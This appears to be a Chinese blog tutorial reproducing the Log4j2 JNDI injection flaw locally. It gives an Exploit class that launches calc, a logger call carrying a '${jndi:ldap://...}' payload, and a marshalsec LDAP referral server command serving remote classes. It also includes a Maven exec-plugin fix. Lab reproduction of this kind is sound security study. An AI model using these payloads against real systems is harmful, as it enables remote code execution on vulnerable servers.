log4j2问题复现

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档

---

一、废话不多说,直接开整

maven依赖

目录结构

Exp.java

    class Exploit{
        Exploit(){

        }
        static {
            System.err.println("Pwned");
            try {
                String cmds = "calc";
                Runtime.getRuntime().exec(cmds);
            } catch ( Exception e ) {
                e.printStackTrace();
            }
        }

    }

Log4j2Test

public class Log4j2Test {

    public static final Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
        logger.error("${jndi:ldap://localhost:8888/Exploit}");
    }
}

\src\test\java>javac exp.java

编译成.class文件

marshalsec-0.0.3-SNAPSHOT-all.jar(需要下载的jar地址)

> http://www.btyear.com/csdn/1974.html#

在对应目录cmd 运行

```java
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:7777/#Exploit" 8888

在运行main方法

可能存在BUG

Failed to execute goal org.codehaus.mojo:exec-maven-plugin:1.6.0:exec (default-cli) on project

<build>
     <plugins>
         <plugin>
             <groupId>org.codehaus.mojo</groupId>
             <artifactId>exec-maven-plugin</artifactId>
             <version>1.6.0</version>
             <executions>
                 <execution>
                     <goals>
                         <goal>java</goal>
                     </goals>
                 </execution>
             </executions>
             <configuration>
                 <classpathScope>test</classpathScope>
             </configuration>
         </plugin>
     </plugins>
</build>